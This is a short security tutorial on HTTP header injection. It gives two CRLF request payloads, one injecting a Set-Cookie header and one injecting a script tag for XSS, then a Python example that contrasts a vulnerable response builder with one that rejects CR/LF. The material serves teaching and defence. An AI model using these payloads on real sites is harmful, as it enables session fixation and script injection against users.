HTTP Header Injection

If the target site inserts a user-provided value into a response header without sanitizing it, an attacker may inject arbitrary header key/value pairs.

Exploit

By inserting \r\n (URL-encoded: %0d%0a), we can end the current header line early and inject an arbitrary header into the response.

# Inject "\r\nSet-Cookie: SESSID=123456" into the response header
/?origin=example%0d%0aSet-Cookie: SESSID%3d123456


Exploit (XSS)

/?origin=example%0d%0a<html><script>alert(1)</script>
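
Both payloads above depend on a decoded CR/LF reaching the code that writes the header line. The following is an added example, not code from the original page: it builds the response once verbatim and once with a CR/LF check, then lists the header names a client would parse. The header name `Access-Control-Allow-Origin` and all function names are assumptions, since the page does not say which header reflects `origin`.

```python
from urllib.parse import parse_qs, urlsplit

CRLF = "\r\n"
# Assumption: the page does not say which header reflects "origin".
HEADER_NAME = "Access-Control-Allow-Origin"


def _origin_param(url):
    """Return the percent-decoded 'origin' query parameter ('' if absent)."""
    return parse_qs(urlsplit(url).query).get("origin", [""])[0]


def _response(origin):
    head = (f"HTTP/1.1 200 OK{CRLF}"
            f"{HEADER_NAME}: {origin}{CRLF}"
            f"Content-Length: 0{CRLF}{CRLF}")
    return head.encode("latin-1")


def build_response_naive(url):
    """Vulnerable: the decoded value is written into the header verbatim."""
    return _response(_origin_param(url))


def build_response_hardened(url):
    """Refuse any value that could end the header line early."""
    origin = _origin_param(url)
    if any(ch in origin for ch in "\r\n\x00"):
        return f"HTTP/1.1 400 Bad Request{CRLF}Content-Length: 0{CRLF}{CRLF}".encode("latin-1")
    return _response(origin)


def header_names(raw):
    """Header names as a client sees them: lines before the first blank line."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    return [line.split(":", 1)[0] for line in head.split(CRLF)[1:] if ":" in line]


if __name__ == "__main__":
    # The two request lines from the page, plus one benign request.
    for url in ("/?origin=example",
                "/?origin=example%0d%0aSet-Cookie: SESSID%3d123456",
                "/?origin=example%0d%0a<html><script>alert(1)</script>"):
        print(url)
        print("  naive:   ", header_names(build_response_naive(url)))
        print("  hardened:", header_names(build_response_hardened(url)))
```

Rejecting the request is safer than stripping the characters, because a stripped value still ends up in the header in a form the application never intended.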